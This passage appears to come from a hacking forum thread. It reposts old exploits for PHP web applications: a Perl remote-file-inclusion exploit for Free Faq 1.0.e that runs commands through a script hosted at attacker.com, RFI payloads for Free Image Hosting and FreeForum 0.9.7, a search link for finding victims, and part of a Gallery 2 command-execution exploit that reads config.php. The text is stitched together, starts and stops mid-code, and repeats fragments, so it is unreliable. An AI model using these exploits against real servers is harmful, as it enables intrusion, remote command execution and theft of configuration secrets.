die($temp[1]); } //if you are here echo "exploit failed "; ?> Black_hat_cr(HCE) Free Faq V 1.0.e Remote File Inclusion Code: #!/usr/bin/perl ################################################################## ################################### # # # Free Faq V 1.0.e # # # # Class: Remote File Inclusion Vulnerability # # Date: 2006/10/19 # # # # Remote: Yes # # # # Type: high # # # # Site: http://www.axxess.ca/FreeFAQ/dl_axxess.php # # # ################################################################## ################################### use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script print "\n"; print "################################################################## ########\n"; print "# #\n"; print "# Free Faq V 1.0.e Remote File Inclusion Vulnerability #\n"; print "# Vul File: index.php #\n"; print "# Bug Found By : Ashiyane Corporation #\n"; print "# Email: Alireza Ahari Ahari[at]ashiyane.ir #\n"; print "# Web Site : www.Ashiyane.ir #\n"; print "# #\n"; print "################################################################## ########\n"; if (@ARGV < 2) { print "\n Usage: Ashiyane.pl [host] [path] "; print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vul="index.php?faqpath=" print "Type Your Commands ( uname -a )\n"; print "For Exiit Type END\n"; print "<Shell> ";$cmd = <STDIN>; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "<Shell> "; $cmd = <STDIN>; } Black_hat_cr(HCE) Free Image Hosting V1(Remote file include) xploit: [server]/[path]/forgot_pass.php?AD_BODY_TEMP=con_c99 kiếm victim: http://www.google.com/search?hl=en&q oogle+Search Black_hat_cr(HCE) FreeForum 0.9.7 (fpath) Remote File Include Vulnerability Dạo này làm ăn khó khăn quá, có cái bug này anh em ăn đỡ khi nào có bug đẹp tớ bù sao Trích: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= FreeForum 0.9.7 (fpath) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= Discovered by XORON(turkish hacker) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= URL: http://www.ezforum.de/downloads/Forum.zip (229kb) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= Vuln. Code: in forum.php. if(!isset($cfg_file))$cfg_file="config/config.inc.php"; if(!isset($fpath))$fpath="."; if(!isset($getvar))$getvar=''; include("$fpath/lib/php/classes.php"); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G, -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= # milw0rm.com [2006-10-07] navaro(HCE) Gallery 2 - Remote Commands Execution Exploit Gallery <= 2.0.3 stepOrder[] Remote Commands Execution Exploit Code: #!/usr/bin/php -q -d short_open_tag=on <? echo "Gallery <=2.0.3 \"stepOrder[]\" remote cmmnds xctn \r\n"; echo "by rgod rgod<AT>autistici<DOT>org \r\n"; echo "site: http://retrogod.altervista.org \r\n\r\n"; echo "-> works with register_globals = On and magic_quotes_gpc = Off \r\n"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n"; echo "host: target server (ip/hostname) \r\n"; echo "path: path to gallery2 \r\n"; echo "user-pass: this exploit needs valid user credentials to upload a \r\n"; echo " watermark \r\n"; echo "cmd: a shell command \r\n"; echo "Options: \r\n"; echo " -p[port]: specify a port other than 80 \r\n"; echo " -P[ip:port]: specify a proxy \r\n"; echo "Examples: \r\n"; echo "php ".$argv[0]." localhost /gallery2/ user pass cat ./ /config.php \r\n"; . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-= Discovered by XORON(turkish hacker) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=